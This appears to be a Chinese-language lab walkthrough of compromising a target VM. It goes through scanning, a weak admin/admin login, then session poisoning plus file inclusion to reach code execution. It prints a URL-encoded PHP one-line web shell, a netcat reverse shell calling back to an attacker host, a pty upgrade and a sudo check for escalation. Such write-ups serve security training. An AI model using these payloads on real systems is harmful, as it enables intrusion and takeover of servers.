端口扫描

靶机ip地址为 192.168.153.156

目录扫描

访问80端口

测试弱口令

根据响应包分析，存在弱口令 admin，admin

但是需要hash加密

加密后得到

8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

登录成功

有搜素框，测试漏洞

分析任意文件读取漏洞

尝试getshell

抓取含有session的数据包

拼接如下路径search读取：

/var/lib/php/sessions/sess_r80l8n38t56o0oa0q8fe808ip1

抓包将数据包放到重放模块里进行测试，发现可以修改user_pref变量的值，从而写入到session文件中，再结合文件包含漏洞，造成RCE的漏洞

写入URL编码后的一句话木马,并在搜索框处输入命令测试是否被执行

%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

写入反弹shell语句

nc+192.168.153.143+8888+-e+/bin/bash

获取一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

sudo -l

提权成功